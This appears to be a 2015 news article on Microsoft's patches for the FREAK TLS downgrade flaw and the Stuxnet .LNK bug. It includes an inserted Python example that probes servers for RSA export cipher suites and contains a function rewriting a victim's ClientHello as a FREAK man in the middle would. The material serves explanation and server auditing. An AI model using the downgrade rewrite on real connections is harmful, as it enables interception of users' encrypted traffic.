UPDATED 07:41 EST / MARCH 11 2015

Microsoft patches FREAK and Stuxnet bugs for Windows PCs

One week after Microsoft released a security advisory warning that hundreds of millions of Windows users could be at risk from the FREAK flaw, a bug that lets an attacker intercept communications by forcing machines into using weaker encryption, the Redmond company has issued an update (bulletin MS15-031, one of 14 bulletins in this month's Patch Tuesday) to fix the vulnerability.

The bug was not unique to Windows: the FREAK update comes just one day after Apple Inc. issued fixes for iOS and OS X, and on March 3 Google released a patch for Chrome on Windows, OS X and Linux.

“This security update resolves a vulnerability in Microsoft Windows that facilitates exploitation of the publicly disclosed FREAK technique, an industry-wide issue that is not specific to Windows operating systems,” said Microsoft, adding that, “The vulnerability could allow a man-in-the-middle (MiTM) attacker to force the downgrading of the key length of an RSA key to EXPORT-grade length in a TLS connection. Any Windows system using Schannel to connect to a remote TLS server with an insecure cipher suite is affected.”

The vulnerability was disclosed last week after French researchers found that an attacker sitting between a browser and a web server could force the TLS connection down to export-grade RSA, a 512-bit key they were then able to factor in a matter of hours on rented cloud computing. The bug is on the client side: an affected client accepts the server's export-grade key even though it never asked for an export cipher suite, so the attack needs both a server that still offers export suites and an unpatched client. Once the key was broken, the researchers could read password data and alter elements of the page returned to the user. In practice, an attacker exploiting the flaw would act as a man in the middle between users and servers, for example on a shared or insecure WiFi network. So far there is no evidence that the vulnerability was exploited by hackers.
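The two halves of the attack described above, as an added example that is not code from the article, the researchers or Microsoft: a server-side check that offers a TLS server only RSA export cipher suites and reports whether the server selects one, and the byte-level rewrite a FREAK man in the middle performs on a victim's ClientHello to force that choice. Cipher suite numbers are the IANA-registered values; the sample ServerHello and alert records at the bottom are constructed for offline use, and the TLS 1.0 record/client version and the hostnames are assumptions chosen for illustration.

```python
"""FREAK export-suite probe and ClientHello downgrade (added example)."""
import os
import socket
import struct
import sys

# RSA export-grade cipher suites (IANA values). A server that selects one of
# these follows its ServerHello with a ServerKeyExchange carrying a
# 512-bit (or, for the EXPORT1024 suites, 1024-bit) temporary RSA key.
RSA_EXPORT_SUITES = {
    0x0003: "TLS_RSA_EXPORT_WITH_RC4_40_MD5",
    0x0006: "TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5",
    0x0008: "TLS_RSA_EXPORT_WITH_DES40_CBC_SHA",
    0x0060: "TLS_RSA_EXPORT1024_WITH_RC4_56_MD5",
    0x0061: "TLS_RSA_EXPORT1024_WITH_RC2_CBC_56_MD5",
    0x0062: "TLS_RSA_EXPORT1024_WITH_DES_CBC_SHA",
    0x0064: "TLS_RSA_EXPORT1024_WITH_RC4_56_SHA",
}


def build_client_hello(hostname, suites, version=0x0301):
    """TLS ClientHello record offering only `suites`, with an SNI extension.
    TLS 1.0 (0x0301) is assumed as the version: export suites date from that era."""
    name = hostname.encode()
    sni_entry = b"\x00" + struct.pack("!H", len(name)) + name       # host_name type
    sni_list = struct.pack("!H", len(sni_entry)) + sni_entry
    ext = struct.pack("!HH", 0x0000, len(sni_list)) + sni_list      # server_name ext
    suite_bytes = b"".join(struct.pack("!H", s) for s in suites)
    body = (struct.pack("!H", version) + os.urandom(32) + b"\x00"    # version, random, empty session id
            + struct.pack("!H", len(suite_bytes)) + suite_bytes
            + b"\x01\x00"                                           # one compression method: null
            + struct.pack("!H", len(ext)) + ext)
    handshake = b"\x01" + len(body).to_bytes(3, "big") + body       # HandshakeType client_hello
    return b"\x16" + struct.pack("!H", version) + struct.pack("!H", len(handshake)) + handshake


def offered_suites(record):
    """Cipher suites listed in a ClientHello record (used to inspect the rewrite)."""
    body = record[9:]                                   # skip 5-byte record + 4-byte handshake header
    p = 35 + body[34]                                   # skip version, random, session id
    cs_len = struct.unpack("!H", body[p:p + 2])[0]
    return [struct.unpack("!H", body[i:i + 2])[0] for i in range(p + 2, p + 2 + cs_len, 2)]


def downgrade_client_hello(record, suites=tuple(RSA_EXPORT_SUITES)):
    """What a FREAK man in the middle does to the victim's ClientHello: replace
    the offered cipher suites with RSA export suites only, fixing the lengths."""
    if record[0] != 0x16 or record[5] != 0x01:
        raise ValueError("not a ClientHello record")
    body = record[9:]
    p = 35 + body[34]
    cs_len = struct.unpack("!H", body[p:p + 2])[0]
    new_cs = b"".join(struct.pack("!H", s) for s in suites)
    new_body = body[:p] + struct.pack("!H", len(new_cs)) + new_cs + body[p + 2 + cs_len:]
    handshake = b"\x01" + len(new_body).to_bytes(3, "big") + new_body
    return record[:3] + struct.pack("!H", len(handshake)) + handshake


def classify_response(data):
    """Interpret the first record a server returns to an export-only ClientHello:
    ("export", suite) if it selected an RSA export suite, ("rejected", alert_desc)
    on an alert (40 = handshake_failure), otherwise ("other", suite_or_None)."""
    if len(data) < 7:
        return ("other", None)
    if data[0] == 0x15:                                 # Alert: level at [5], description at [6]
        return ("rejected", data[6])
    if data[0] == 0x16 and data[5] == 0x02:             # Handshake record holding a ServerHello
        body = data[9:]
        sid_len = body[34]
        suite = struct.unpack("!H", body[35 + sid_len:37 + sid_len])[0]
        return ("export", suite) if suite in RSA_EXPORT_SUITES else ("other", suite)
    return ("other", None)


def probe(host, port=443, timeout=5.0):
    """Offer a live server only RSA export suites and classify its answer."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(build_client_hello(host, list(RSA_EXPORT_SUITES)))
        return classify_response(s.recv(4096))


# Constructed sample responses (not captured from any real host):
# a ServerHello selecting 0x0008, and a handshake_failure alert.
SAMPLE_SERVER_HELLO = (b"\x16\x03\x01" + struct.pack("!H", 4 + 38)
                       + b"\x02" + (38).to_bytes(3, "big")
                       + b"\x03\x01" + b"\x00" * 32 + b"\x00" + b"\x00\x08" + b"\x00")
SAMPLE_ALERT = b"\x15\x03\x01\x00\x02\x02\x28"

if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "example.com"   # assumed hostname
    print(target, classify_response(SAMPLE_SERVER_HELLO), classify_response(SAMPLE_ALERT))
    print(target, probe(target))
```

A server that answers `("export", …)` still has the export suites enabled; that alone does not compromise a patched client, but it is the half of the condition a server operator controls, and the fix is to remove every RSA_EXPORT suite from the server's cipher list. The probe offers only export suites and sends no extensions beyond SNI, so a server that requires TLS 1.2-only features may answer with an alert for reasons unrelated to export support; treat "rejected" as a negative result only when a normal handshake to the same host succeeds.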

FREAK (Factoring RSA Export Keys) has its roots in 1990s U.S. policy: the government, wanting to keep an eye on communications abroad, restricted the export of strong encryption, so software shipped with "export-grade" cipher suites that used deliberately weakened 512-bit RSA keys. The export rules were later relaxed, but those weaker cipher suites survived in modern software and on many servers.

Also included in the updates (bulletin MS15-020) is a patch for a bug exploited by Stuxnet, which Microsoft thought it had fixed back in 2010; the earlier fix for the flaw in how Windows handles shortcut (.LNK) files turned out to be incomplete. Stuxnet was a worm allegedly created by the U.S. and Israeli governments to infiltrate Iran's nuclear enrichment facility, sabotage its centrifuges, and in doing so destabilize Iran's nuclear program. The worm has since been found on systems in other countries around the world.

Photo credit: Dave Rosen via photopin cc
